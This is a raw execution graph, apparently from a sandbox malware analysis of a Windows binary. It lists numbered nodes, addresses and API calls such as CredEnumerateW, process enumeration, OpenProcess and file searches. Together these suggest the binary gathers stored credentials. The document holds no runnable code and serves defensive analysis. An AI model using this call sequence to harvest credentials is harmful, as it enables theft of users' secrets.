                                                                                              execution_graph 40175 441819 40178 430737 40175->40178 40177 441825 40179 430756 40178->40179 40180 43076d 40178->40180 40181 430774 40179->40181 40182 43075f 40179->40182 40180->40177 40193 43034a memcpy 40181->40193 40192 4169a7 11 API calls 40182->40192 40185 4307ce 40186 430819 memset 40185->40186 40194 415b2c 11 API calls 40185->40194 40186->40180 40187 43077e 40187->40180 40187->40185 40190 4307fa 40187->40190 40189 4307e9 40189->40180 40189->40186 40195 4169a7 11 API calls 40190->40195 40192->40180 40193->40187 40194->40189 40195->40180 37540 442ec6 19 API calls 37717 4152c6 malloc 37718 4152e2 37717->37718 37719 4152ef 37717->37719 37721 416760 11 API calls 37719->37721 37721->37718 37722 4466f4 37741 446904 37722->37741 37724 446700 GetModuleHandleA 37727 446710 __set_app_type __p__fmode __p__commode 37724->37727 37726 4467a4 37728 4467ac __setusermatherr 37726->37728 37729 4467b8 37726->37729 37727->37726 37728->37729 37742 4468f0 _controlfp 37729->37742 37731 4467bd _initterm __wgetmainargs _initterm 37732 44681e GetStartupInfoW 37731->37732 37733 446810 37731->37733 37735 446866 GetModuleHandleA 37732->37735 37743 41276d 37735->37743 37739 446896 exit 37740 44689d _cexit 37739->37740 37740->37733 37741->37724 37742->37731 37744 41277d 37743->37744 37786 4044a4 LoadLibraryW 37744->37786 37746 412785 37747 412789 37746->37747 37794 414b81 37746->37794 37747->37739 37747->37740 37750 4127c8 37800 412465 memset ??2@YAPAXI 37750->37800 37752 4127ea 37812 40ac21 37752->37812 37757 412813 37830 40dd07 memset 37757->37830 37758 412827 37835 40db69 memset 37758->37835 37761 412822 37856 4125b6 ??3@YAXPAX 37761->37856 37763 40ada2 _wcsicmp 37764 41283d 37763->37764 37764->37761 37768 412863 CoInitialize 37764->37768 37840 41268e 37764->37840 37860 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37768->37860 37769 41296f 37862 40b633 37769->37862 37774 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37778 412957 37774->37778 37783 4128ca 37774->37783 37778->37761 37779 4128d0 TranslateAcceleratorW 37780 412941 GetMessageW 37779->37780 37779->37783 37780->37778 37780->37779 37781 412909 IsDialogMessageW 37781->37780 37781->37783 37782 4128fd IsDialogMessageW 37782->37780 37782->37781 37783->37779 37783->37781 37783->37782 37784 41292b TranslateMessage DispatchMessageW 37783->37784 37785 41291f IsDialogMessageW 37783->37785 37784->37780 37785->37780 37785->37784 37787 4044f7 37786->37787 37788 4044cf GetProcAddress 37786->37788 37792 404507 MessageBoxW 37787->37792 37793 40451e 37787->37793 37789 4044e8 FreeLibrary 37788->37789 37790 4044df 37788->37790 37789->37787 37791 4044f3 37789->37791 37790->37789 37791->37787 37792->37746 37793->37746 37795 414b8a 37794->37795 37796 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37794->37796 37866 40a804 memset 37795->37866 37796->37750 37799 414b9e GetProcAddress 37799->37796 37801 4124e0 37800->37801 37802 412505 ??2@YAPAXI 37801->37802 37803 41251c 37802->37803 37805 412521 37802->37805 37888 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37803->37888 37877 444722 37805->37877 37811 41259b wcscpy 37811->37752 37893 40b1ab ??3@YAXPAX ??3@YAXPAX 37812->37893 37814 40ac5c 37817 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37814->37817 37818 40ad4b 37814->37818 37820 40ace7 ??3@YAXPAX 37814->37820 37825 40ad76 37814->37825 37897 40a8d0 37814->37897 37909 4099f4 37814->37909 37817->37814 37818->37825 37917 40a9ce 37818->37917 37820->37814 37824 40a8d0 7 API calls 37824->37825 37894 40aa04 37825->37894 37826 40ada2 37828 40adc9 37826->37828 37829 40adaa 37826->37829 37827 40adb3 _wcsicmp 37827->37828 37827->37829 37828->37757 37828->37758 37829->37827 37829->37828 37922 40dce0 37830->37922 37832 40dd3a GetModuleHandleW 37927 40dba7 37832->37927 37836 40dce0 3 API calls 37835->37836 37837 40db99 37836->37837 37999 40dae1 37837->37999 38013 402f3a 37840->38013 37842 412766 37842->37761 37842->37768 37843 4126d3 _wcsicmp 37844 4126a8 37843->37844 37844->37842 37844->37843 37846 41270a 37844->37846 38047 4125f8 7 API calls 37844->38047 37846->37842 38016 411ac5 37846->38016 37857 4125da 37856->37857 37858 4125f0 37857->37858 37859 4125e6 DeleteObject 37857->37859 37861 40b1ab ??3@YAXPAX ??3@YAXPAX 37858->37861 37859->37858 37860->37774 37861->37769 37863 40b640 37862->37863 37864 40b639 ??3@YAXPAX 37862->37864 37865 40b1ab ??3@YAXPAX ??3@YAXPAX 37863->37865 37864->37863 37865->37747 37867 40a83b GetSystemDirectoryW 37866->37867 37868 40a84c wcscpy 37866->37868 37867->37868 37873 409719 wcslen 37868->37873 37871 40a881 LoadLibraryW 37872 40a886 37871->37872 37872->37796 37872->37799 37874 409724 37873->37874 37875 409739 wcscat LoadLibraryW 37873->37875 37874->37875 37876 40972c wcscat 37874->37876 37875->37871 37875->37872 37876->37875 37878 444732 37877->37878 37879 444728 DeleteObject 37877->37879 37889 409cc3 37878->37889 37879->37878 37881 412551 37882 4010f9 37881->37882 37883 401130 37882->37883 37884 401134 GetModuleHandleW LoadIconW 37883->37884 37885 401107 wcsncat 37883->37885 37886 40a7be 37884->37886 37885->37883 37887 40a7d2 37886->37887 37887->37811 37887->37887 37888->37805 37892 409bfd memset wcscpy 37889->37892 37891 409cdb CreateFontIndirectW 37891->37881 37892->37891 37893->37814 37895 40aa14 37894->37895 37896 40aa0a ??3@YAXPAX 37894->37896 37895->37826 37896->37895 37898 40a8eb 37897->37898 37899 40a8df wcslen 37897->37899 37900 40a906 ??3@YAXPAX 37898->37900 37901 40a90f 37898->37901 37899->37898 37902 40a919 37900->37902 37903 4099f4 3 API calls 37901->37903 37904 40a932 37902->37904 37905 40a929 ??3@YAXPAX 37902->37905 37903->37902 37907 4099f4 3 API calls 37904->37907 37906 40a93e memcpy 37905->37906 37906->37814 37908 40a93d 37907->37908 37908->37906 37910 409a41 37909->37910 37911 4099fb malloc 37909->37911 37910->37814 37913 409a37 37911->37913 37914 409a1c 37911->37914 37913->37814 37915 409a30 ??3@YAXPAX 37914->37915 37916 409a20 memcpy 37914->37916 37915->37913 37916->37915 37918 40a9e7 37917->37918 37919 40a9dc ??3@YAXPAX 37917->37919 37921 4099f4 3 API calls 37918->37921 37920 40a9f2 37919->37920 37920->37824 37921->37920 37946 409bca GetModuleFileNameW 37922->37946 37924 40dce6 wcsrchr 37925 40dcf5 37924->37925 37926 40dcf9 wcscat 37924->37926 37925->37926 37926->37832 37947 44db70 37927->37947 37931 40dbfd 37950 4447d9 37931->37950 37934 40dc34 wcscpy wcscpy 37976 40d6f5 37934->37976 37935 40dc1f wcscpy 37935->37934 37938 40d6f5 3 API calls 37939 40dc73 37938->37939 37940 40d6f5 3 API calls 37939->37940 37941 40dc89 37940->37941 37942 40d6f5 3 API calls 37941->37942 37943 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37942->37943 37982 40da80 37943->37982 37946->37924 37948 40dbb4 memset memset 37947->37948 37949 409bca GetModuleFileNameW 37948->37949 37949->37931 37952 4447f4 37950->37952 37951 40dc1b 37951->37934 37951->37935 37952->37951 37953 444807 ??2@YAPAXI 37952->37953 37954 44481f 37953->37954 37955 444873 _snwprintf 37954->37955 37956 4448ab wcscpy 37954->37956 37989 44474a 8 API calls 37955->37989 37957 4448bb 37956->37957 37990 44474a 8 API calls 37957->37990 37960 4448a7 37960->37956 37960->37957 37961 4448cd 37991 44474a 8 API calls 37961->37991 37963 4448e2 37992 44474a 8 API calls 37963->37992 37965 4448f7 37993 44474a 8 API calls 37965->37993 37967 44490c 37994 44474a 8 API calls 37967->37994 37969 444921 37995 44474a 8 API calls 37969->37995 37971 444936 37996 44474a 8 API calls 37971->37996 37973 44494b 37997 44474a 8 API calls 37973->37997 37975 444960 ??3@YAXPAX 37975->37951 37977 44db70 37976->37977 37978 40d702 memset GetPrivateProfileStringW 37977->37978 37979 40d752 37978->37979 37980 40d75c WritePrivateProfileStringW 37978->37980 37979->37980 37981 40d758 37979->37981 37980->37981 37981->37938 37983 44db70 37982->37983 37984 40da8d memset 37983->37984 37985 40daac LoadStringW 37984->37985 37986 40dac6 37985->37986 37986->37985 37988 40dade 37986->37988 37998 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37986->37998 37988->37761 37989->37960 37990->37961 37991->37963 37992->37965 37993->37967 37994->37969 37995->37971 37996->37973 37997->37975 37998->37986 38009 409b98 GetFileAttributesW 37999->38009 38001 40daea 38002 40db63 38001->38002 38003 40daef wcscpy wcscpy GetPrivateProfileIntW 38001->38003 38002->37763 38010 40d65d GetPrivateProfileStringW 38003->38010 38005 40db3e 38011 40d65d GetPrivateProfileStringW 38005->38011 38007 40db4f 38012 40d65d GetPrivateProfileStringW 38007->38012 38009->38001 38010->38005 38011->38007 38012->38002 38048 40eaff 38013->38048 38017 411ae2 memset 38016->38017 38018 411b8f 38016->38018 38088 409bca GetModuleFileNameW 38017->38088 38030 411a8b 38018->38030 38020 411b0a wcsrchr 38021 411b22 wcscat 38020->38021 38022 411b1f 38020->38022 38089 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38021->38089 38022->38021 38024 411b67 38090 402afb 38024->38090 38028 411b7f 38146 40ea13 SendMessageW memset SendMessageW 38028->38146 38031 402afb 27 API calls 38030->38031 38032 411ac0 38031->38032 38033 4110dc 38032->38033 38034 41113e 38033->38034 38039 4110f0 38033->38039 38171 40969c LoadCursorW SetCursor 38034->38171 38036 411143 38172 4032b4 38036->38172 38190 444a54 38036->38190 38037 4110f7 _wcsicmp 38037->38039 38038 411157 38040 40ada2 _wcsicmp 38038->38040 38039->38034 38039->38037 38193 410c46 10 API calls 38039->38193 38043 411167 38040->38043 38041 4111af 38043->38041 38044 4111a6 qsort 38043->38044 38044->38041 38047->37844 38049 40eb10 38048->38049 38061 40e8e0 38049->38061 38052 40eb6c memcpy memcpy 38056 40ebb7 38052->38056 38053 40ebf2 ??2@YAPAXI ??2@YAPAXI 38055 40ec2e ??2@YAPAXI 38053->38055 38058 40ec65 38053->38058 38054 40d134 16 API calls 38054->38056 38055->38058 38056->38052 38056->38053 38056->38054 38058->38058 38071 40ea7f 38058->38071 38060 402f49 38060->37844 38062 40e8f2 38061->38062 38063 40e8eb ??3@YAXPAX 38061->38063 38064 40e900 38062->38064 38065 40e8f9 ??3@YAXPAX 38062->38065 38063->38062 38066 40e911 38064->38066 38067 40e90a ??3@YAXPAX 38064->38067 38065->38064 38068 40e931 ??2@YAPAXI ??2@YAPAXI 38066->38068 38069 40e921 ??3@YAXPAX 38066->38069 38070 40e92a ??3@YAXPAX 38066->38070 38067->38066 38068->38052 38069->38070 38070->38068 38072 40aa04 ??3@YAXPAX 38071->38072 38073 40ea88 38072->38073 38074 40aa04 ??3@YAXPAX 38073->38074 38075 40ea90 38074->38075 38076 40aa04 ??3@YAXPAX 38075->38076 38077 40ea98 38076->38077 38078 40aa04 ??3@YAXPAX 38077->38078 38079 40eaa0 38078->38079 38080 40a9ce 4 API calls 38079->38080 38081 40eab3 38080->38081 38082 40a9ce 4 API calls 38081->38082 38083 40eabd 38082->38083 38084 40a9ce 4 API calls 38083->38084 38085 40eac7 38084->38085 38086 40a9ce 4 API calls 38085->38086 38087 40ead1 38086->38087 38087->38060 38088->38020 38089->38024 38147 40b2cc 38090->38147 38092 402b0a 38093 40b2cc 27 API calls 38092->38093 38094 402b23 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402b3a 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402b54 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402b6b 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402b82 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402b99 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402bb0 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402bc7 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402bde 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402bf5 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c0c 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402c23 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402c3a 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402c51 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402c68 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402c7f 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402c99 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402cb3 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402cd5 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402cf0 38131->38132 38133 40b2cc 27 API calls 38132->38133 38134 402d0b 38133->38134 38135 40b2cc 27 API calls 38134->38135 38136 402d26 38135->38136 38137 40b2cc 27 API calls 38136->38137 38138 402d3e 38137->38138 38139 40b2cc 27 API calls 38138->38139 38140 402d59 38139->38140 38141 40b2cc 27 API calls 38140->38141 38142 402d78 38141->38142 38143 40b2cc 27 API calls 38142->38143 38144 402d93 38143->38144 38145 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38144->38145 38145->38028 38146->38018 38150 40b58d 38147->38150 38149 40b2d1 38149->38092 38151 40b5a4 GetModuleHandleW FindResourceW 38150->38151 38152 40b62e 38150->38152 38153 40b5c2 LoadResource 38151->38153 38155 40b5e7 38151->38155 38152->38149 38154 40b5d0 SizeofResource LockResource 38153->38154 38153->38155 38154->38155 38155->38152 38163 40afcf 38155->38163 38157 40b608 memcpy 38166 40b4d3 memcpy 38157->38166 38159 40b61e 38167 40b3c1 18 API calls 38159->38167 38161 40b626 38168 40b04b 38161->38168 38164 40b04b ??3@YAXPAX 38163->38164 38165 40afd7 ??2@YAPAXI 38164->38165 38165->38157 38166->38159 38167->38161 38169 40b051 ??3@YAXPAX 38168->38169 38170 40b05f 38168->38170 38169->38170 38170->38152 38171->38036 38173 4032c4 38172->38173 38174 40b633 ??3@YAXPAX 38173->38174 38175 403316 38174->38175 38194 44553b 38175->38194 38179 403480 38390 40368c 15 API calls 38179->38390 38181 403489 38182 40b633 ??3@YAXPAX 38181->38182 38183 403495 38182->38183 38183->38038 38184 4033a9 memset memcpy 38185 4033ec wcscmp 38184->38185 38186 40333c 38184->38186 38185->38186 38186->38179 38186->38184 38186->38185 38388 4028e7 11 API calls 38186->38388 38389 40f508 6 API calls 38186->38389 38188 403421 _wcsicmp 38188->38186 38191 444a64 FreeLibrary 38190->38191 38192 444a83 38190->38192 38191->38192 38192->38038 38193->38039 38195 445548 38194->38195 38196 445599 38195->38196 38391 40c768 38195->38391 38197 4455a8 memset 38196->38197 38338 4457f2 38196->38338 38474 403988 38197->38474 38204 445854 38205 4458aa 38204->38205 38599 403c9c memset memset memset memset memset 38204->38599 38207 44594a 38205->38207 38208 4458bb memset memset 38205->38208 38206 445672 38485 403fbe memset memset memset memset memset 38206->38485 38210 4459ed 38207->38210 38211 44595e memset memset 38207->38211 38213 414c2e 16 API calls 38208->38213 38215 445a00 memset memset 38210->38215 38216 445b22 38210->38216 38217 414c2e 16 API calls 38211->38217 38212 4455e5 38212->38206 38229 44560f 38212->38229 38218 4458f9 38213->38218 38622 414c2e 38215->38622 38221 445bca 38216->38221 38222 445b38 memset memset memset 38216->38222 38227 44599c 38217->38227 38228 40b2cc 27 API calls 38218->38228 38219 44558c 38458 444b06 38219->38458 38238 445c8b memset memset 38221->38238 38288 445cf0 38221->38288 38233 445bd4 38222->38233 38234 445b98 38222->38234 38223 445849 38686 40b1ab ??3@YAXPAX ??3@YAXPAX 38223->38686 38237 40b2cc 27 API calls 38227->38237 38239 445909 38228->38239 38230 4087b3 338 API calls 38229->38230 38249 445621 38230->38249 38231 44557a 38231->38219 38671 41366b FreeLibrary 38231->38671 38232 44589f 38687 40b1ab ??3@YAXPAX ??3@YAXPAX 38232->38687 38246 414c2e 16 API calls 38233->38246 38234->38233 38242 445ba2 38234->38242 38251 4459ac 38237->38251 38240 414c2e 16 API calls 38238->38240 38248 409d1f 6 API calls 38239->38248 38252 445cc9 38240->38252 38759 4099c6 wcslen 38242->38759 38243 4456b2 38674 40b1ab ??3@YAXPAX ??3@YAXPAX 38243->38674 38245 40b2cc 27 API calls 38255 445a4f 38245->38255 38257 445be2 38246->38257 38247 403335 38387 4452e5 45 API calls 38247->38387 38260 445919 38248->38260 38672 4454bf 20 API calls 38249->38672 38250 445823 38250->38223 38268 4087b3 338 API calls 38250->38268 38261 409d1f 6 API calls 38251->38261 38262 409d1f 6 API calls 38252->38262 38253 445879 38253->38232 38272 4087b3 338 API calls 38253->38272 38637 409d1f wcslen wcslen 38255->38637 38266 40b2cc 27 API calls 38257->38266 38258 445d3d 38286 40b2cc 27 API calls 38258->38286 38259 445d88 memset memset memset 38269 414c2e 16 API calls 38259->38269 38688 409b98 GetFileAttributesW 38260->38688 38270 4459bc 38261->38270 38271 445ce1 38262->38271 38263 445bb3 38762 445403 memset 38263->38762 38264 445680 38264->38243 38508 4087b3 memset 38264->38508 38275 445bf3 38266->38275 38268->38250 38278 445dde 38269->38278 38755 409b98 GetFileAttributesW 38270->38755 38779 409b98 GetFileAttributesW 38271->38779 38272->38253 38285 409d1f 6 API calls 38275->38285 38276 445928 38276->38207 38689 40b6ef 38276->38689 38287 40b2cc 27 API calls 38278->38287 38280 4459cb 38280->38210 38297 40b6ef 252 API calls 38280->38297 38284 40b2cc 27 API calls 38290 445a94 38284->38290 38292 445c07 38285->38292 38293 445d54 _wcsicmp 38286->38293 38296 445def 38287->38296 38288->38247 38288->38258 38288->38259 38289 445389 258 API calls 38289->38221 38642 40ae18 38290->38642 38291 44566d 38291->38338 38559 413d4c 38291->38559 38300 445389 258 API calls 38292->38300 38301 445d71 38293->38301 38364 445d67 38293->38364 38295 445665 38673 40b1ab ??3@YAXPAX ??3@YAXPAX 38295->38673 38302 409d1f 6 API calls 38296->38302 38297->38210 38305 445c17 38300->38305 38780 445093 23 API calls 38301->38780 38308 445e03 38302->38308 38304 4456d8 38310 40b2cc 27 API calls 38304->38310 38311 40b2cc 27 API calls 38305->38311 38307 44563c 38307->38295 38313 4087b3 338 API calls 38307->38313 38781 409b98 GetFileAttributesW 38308->38781 38309 40b6ef 252 API calls 38309->38247 38315 4456e2 38310->38315 38316 445c23 38311->38316 38312 445d83 38312->38247 38313->38307 38675 413fa6 _wcsicmp _wcsicmp 38315->38675 38320 409d1f 6 API calls 38316->38320 38318 445e12 38321 445e6b 38318->38321 38325 40b2cc 27 API calls 38318->38325 38323 445c37 38320->38323 38783 445093 23 API calls 38321->38783 38322 4456eb 38328 4456fd memset memset memset memset 38322->38328 38329 4457ea 38322->38329 38330 445389 258 API calls 38323->38330 38324 445b17 38756 40aebe 38324->38756 38332 445e33 38325->38332 38676 409c70 wcscpy wcsrchr 38328->38676 38679 413d29 38329->38679 38336 445c47 38330->38336 38337 409d1f 6 API calls 38332->38337 38334 445e7e 38339 445f67 38334->38339 38342 40b2cc 27 API calls 38336->38342 38343 445e47 38337->38343 38338->38204 38576 403e2d memset memset memset memset memset 38338->38576 38344 40b2cc 27 API calls 38339->38344 38340 445ab2 memset 38345 40b2cc 27 API calls 38340->38345 38347 445c53 38342->38347 38782 409b98 GetFileAttributesW 38343->38782 38349 445f73 38344->38349 38350 445aa1 38345->38350 38346 409c70 2 API calls 38351 44577e 38346->38351 38352 409d1f 6 API calls 38347->38352 38354 409d1f 6 API calls 38349->38354 38350->38324 38350->38340 38355 409d1f 6 API calls 38350->38355 38649 40add4 38350->38649 38654 445389 38350->38654 38663 40ae51 38350->38663 38356 409c70 2 API calls 38351->38356 38357 445c67 38352->38357 38353 445e56 38353->38321 38361 445e83 memset 38353->38361 38358 445f87 38354->38358 38355->38350 38359 44578d 38356->38359 38360 445389 258 API calls 38357->38360 38786 409b98 GetFileAttributesW 38358->38786 38359->38329 38366 40b2cc 27 API calls 38359->38366 38360->38221 38365 40b2cc 27 API calls 38361->38365 38364->38247 38364->38309 38367 445eab 38365->38367 38368 4457a8 38366->38368 38369 409d1f 6 API calls 38367->38369 38370 409d1f 6 API calls 38368->38370 38372 445ebf 38369->38372 38371 4457b8 38370->38371 38678 409b98 GetFileAttributesW 38371->38678 38374 40ae18 9 API calls 38372->38374 38378 445ef5 38374->38378 38375 4457c7 38375->38329 38377 4087b3 338 API calls 38375->38377 38376 40ae51 9 API calls 38376->38378 38377->38329 38378->38376 38379 445f5c 38378->38379 38381 40add4 2 API calls 38378->38381 38382 40b2cc 27 API calls 38378->38382 38383 409d1f 6 API calls 38378->38383 38385 445f3a 38378->38385 38784 409b98 GetFileAttributesW 38378->38784 38380 40aebe FindClose 38379->38380 38380->38339 38381->38378 38382->38378 38383->38378 38785 445093 23 API calls 38385->38785 38387->38186 38388->38188 38389->38186 38390->38181 38392 40c775 38391->38392 38787 40b1ab ??3@YAXPAX ??3@YAXPAX 38392->38787 38394 40c788 38788 40b1ab ??3@YAXPAX ??3@YAXPAX 38394->38788 38396 40c790 38789 40b1ab ??3@YAXPAX ??3@YAXPAX 38396->38789 38398 40c798 38399 40aa04 ??3@YAXPAX 38398->38399 38400 40c7a0 38399->38400 38790 40c274 memset 38400->38790 38405 40a8ab 9 API calls 38406 40c7c3 38405->38406 38407 40a8ab 9 API calls 38406->38407 38408 40c7d0 38407->38408 38819 40c3c3 38408->38819 38412 40c877 38421 40bdb0 38412->38421 38413 40c86c 38861 4053fe 39 API calls 38413->38861 38419 40c7e5 38419->38412 38419->38413 38420 40c634 49 API calls 38419->38420 38844 40a706 38419->38844 38420->38419 39029 404363 38421->39029 38424 40bf5d 39049 40440c 38424->39049 38426 40bdee 38426->38424 38429 40b2cc 27 API calls 38426->38429 38427 40bddf CredEnumerateW 38427->38426 38430 40be02 wcslen 38429->38430 38430->38424 38437 40be1e 38430->38437 38431 40be26 _wcsncoll 38431->38437 38434 40be7d memset 38435 40bea7 memcpy 38434->38435 38434->38437 38436 40bf11 wcschr 38435->38436 38435->38437 38436->38437 38437->38424 38437->38431 38437->38434 38437->38435 38437->38436 38438 40b2cc 27 API calls 38437->38438 38440 40bf43 LocalFree 38437->38440 39052 40bd5d 28 API calls 38437->39052 39053 404423 38437->39053 38439 40bef6 _wcsnicmp 38438->38439 38439->38436 38439->38437 38440->38437 38441 4135f7 39066 4135e0 38441->39066 38444 40b2cc 27 API calls 38445 41360d 38444->38445 38446 40a804 8 API calls 38445->38446 38447 413613 38446->38447 38448 41361b 38447->38448 38449 41363e 38447->38449 38450 40b273 27 API calls 38448->38450 38451 4135e0 FreeLibrary 38449->38451 38452 413625 GetProcAddress 38450->38452 38453 413643 38451->38453 38452->38449 38454 413648 38452->38454 38453->38231 38455 413658 38454->38455 38456 4135e0 FreeLibrary 38454->38456 38455->38231 38457 413666 38456->38457 38457->38231 39069 4449b9 38458->39069 38461 4449b9 42 API calls 38463 444b4b 38461->38463 38462 444c15 38465 4449b9 42 API calls 38462->38465 38463->38462 39090 444972 GetVersionExW 38463->39090 38466 444c1f 38465->38466 38466->38196 38467 444b99 memcmp 38472 444b8c 38467->38472 38468 444c0b 39094 444a85 42 API calls 38468->39094 38472->38467 38472->38468 39091 444aa5 42 API calls 38472->39091 39092 40a7a0 GetVersionExW 38472->39092 39093 444a85 42 API calls 38472->39093 38475 40399d 38474->38475 39095 403a16 38475->39095 38478 403a12 wcsrchr 38478->38212 38481 4039a3 38482 4039f4 38481->38482 38484 403a09 38481->38484 39106 40a02c CreateFileW 38481->39106 38483 4099c6 2 API calls 38482->38483 38482->38484 38483->38484 39109 40b1ab ??3@YAXPAX ??3@YAXPAX 38484->39109 38486 414c2e 16 API calls 38485->38486 38487 404048 38486->38487 38488 414c2e 16 API calls 38487->38488 38489 404056 38488->38489 38490 409d1f 6 API calls 38489->38490 38491 404073 38490->38491 38492 409d1f 6 API calls 38491->38492 38493 40408e 38492->38493 38494 409d1f 6 API calls 38493->38494 38495 4040a6 38494->38495 38496 403af5 20 API calls 38495->38496 38497 4040ba 38496->38497 38498 403af5 20 API calls 38497->38498 38499 4040cb 38498->38499 39136 40414f memset 38499->39136 38501 404140 39150 40b1ab ??3@YAXPAX ??3@YAXPAX 38501->39150 38502 4040ec memset 38506 4040e0 38502->38506 38504 404148 38504->38264 38505 4099c6 2 API calls 38505->38506 38506->38501 38506->38502 38506->38505 38507 40a8ab 9 API calls 38506->38507 38507->38506 39163 40a6e6 WideCharToMultiByte 38508->39163 38510 4087ed 39164 4095d9 memset 38510->39164 38513 408809 memset memset memset memset memset 38514 40b2cc 27 API calls 38513->38514 38515 4088a1 38514->38515 38516 409d1f 6 API calls 38515->38516 38517 4088b1 38516->38517 38518 40b2cc 27 API calls 38517->38518 38519 4088c0 38518->38519 38520 409d1f 6 API calls 38519->38520 38521 4088d0 38520->38521 38522 40b2cc 27 API calls 38521->38522 38523 4088df 38522->38523 38524 409d1f 6 API calls 38523->38524 38525 4088ef 38524->38525 38526 40b2cc 27 API calls 38525->38526 38527 4088fe 38526->38527 38528 409d1f 6 API calls 38527->38528 38529 40890e 38528->38529 38530 40b2cc 27 API calls 38529->38530 38531 40891d 38530->38531 38532 409d1f 6 API calls 38531->38532 38533 40892d 38532->38533 39183 409b98 GetFileAttributesW 38533->39183 38535 40893e 38536 408943 38535->38536 38537 408958 38535->38537 39184 407fdf 75 API calls 38536->39184 39185 409b98 GetFileAttributesW 38537->39185 38540 408964 38541 408969 38540->38541 38542 40897b 38540->38542 39186 4082c7 199 API calls 38541->39186 39187 409b98 GetFileAttributesW 38542->39187 38545 408987 38547 4089a1 38545->38547 38548 40898c 38545->38548 38546 408953 38546->38264 38560 40b633 ??3@YAXPAX 38559->38560 38561 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38560->38561 38562 413f00 Process32NextW 38561->38562 38563 413da5 OpenProcess 38562->38563 38564 413f17 FindCloseChangeNotification 38562->38564 38565 413eb0 38563->38565 38566 413df3 memset 38563->38566 38564->38304 38565->38562 38568 413ebf ??3@YAXPAX 38565->38568 38569 4099f4 3 API calls 38565->38569 39475 413f27 38566->39475 38568->38565 38569->38565 38571 413e37 GetModuleHandleW 38572 413e46 GetProcAddress 38571->38572 38573 413e1f 38571->38573 38572->38573 38573->38571 39480 413959 38573->39480 39496 413ca4 38573->39496 38575 413ea2 CloseHandle 38575->38565 38577 414c2e 16 API calls 38576->38577 38578 403eb7 38577->38578 38579 414c2e 16 API calls 38578->38579 38580 403ec5 38579->38580 38581 409d1f 6 API calls 38580->38581 38582 403ee2 38581->38582 38583 409d1f 6 API calls 38582->38583 38584 403efd 38583->38584 38585 409d1f 6 API calls 38584->38585 38586 403f15 38585->38586 38587 403af5 20 API calls 38586->38587 38588 403f29 38587->38588 38589 403af5 20 API calls 38588->38589 38590 403f3a 38589->38590 38591 40414f 33 API calls 38590->38591 38597 403f4f 38591->38597 38592 403faf 39510 40b1ab ??3@YAXPAX ??3@YAXPAX 38592->39510 38594 403f5b memset 38594->38597 38595 403fb7 38595->38250 38596 4099c6 2 API calls 38596->38597 38597->38592 38597->38594 38597->38596 38598 40a8ab 9 API calls 38597->38598 38598->38597 38600 414c2e 16 API calls 38599->38600 38601 403d26 38600->38601 38602 414c2e 16 API calls 38601->38602 38603 403d34 38602->38603 38604 409d1f 6 API calls 38603->38604 38605 403d51 38604->38605 38606 409d1f 6 API calls 38605->38606 38607 403d6c 38606->38607 38608 409d1f 6 API calls 38607->38608 38609 403d84 38608->38609 38610 403af5 20 API calls 38609->38610 38611 403d98 38610->38611 38612 403af5 20 API calls 38611->38612 38613 403da9 38612->38613 38614 40414f 33 API calls 38613->38614 38620 403dbe 38614->38620 38615 403e1e 39511 40b1ab ??3@YAXPAX ??3@YAXPAX 38615->39511 38616 403dca memset 38616->38620 38618 403e26 38618->38253 38619 4099c6 2 API calls 38619->38620 38620->38615 38620->38616 38620->38619 38621 40a8ab 9 API calls 38620->38621 38621->38620 38623 414b81 9 API calls 38622->38623 38624 414c40 38623->38624 38625 414c73 memset 38624->38625 39512 409cea 38624->39512 38629 414c94 38625->38629 38628 414c64 38628->38245 39515 414592 RegOpenKeyExW 38629->39515 38631 414cc1 38632 414cf4 wcscpy 38631->38632 39516 414bb0 wcscpy 38631->39516 38632->38628 38634 414cd2 39517 4145ac RegQueryValueExW 38634->39517 38636 414ce9 RegCloseKey 38636->38632 38638 409d43 wcscpy 38637->38638 38640 409d62 38637->38640 38639 409719 2 API calls 38638->38639 38641 409d51 wcscat 38639->38641 38640->38284 38641->38640 38643 40aebe FindClose 38642->38643 38644 40ae21 38643->38644 38645 4099c6 2 API calls 38644->38645 38646 40ae35 38645->38646 38647 409d1f 6 API calls 38646->38647 38648 40ae49 38647->38648 38648->38350 38650 40ade0 38649->38650 38651 40ae0f 38649->38651 38650->38651 38652 40ade7 wcscmp 38650->38652 38651->38350 38652->38651 38653 40adfe wcscmp 38652->38653 38653->38651 38655 40ae18 9 API calls 38654->38655 38661 4453c4 38655->38661 38656 40ae51 9 API calls 38656->38661 38657 4453f3 38658 40aebe FindClose 38657->38658 38660 4453fe 38658->38660 38659 40add4 2 API calls 38659->38661 38660->38350 38661->38656 38661->38657 38661->38659 38662 445403 253 API calls 38661->38662 38662->38661 38664 40ae7b FindNextFileW 38663->38664 38665 40ae5c FindFirstFileW 38663->38665 38666 40ae94 38664->38666 38667 40ae8f 38664->38667 38665->38666 38669 40aeb6 38666->38669 38670 409d1f 6 API calls 38666->38670 38668 40aebe FindClose 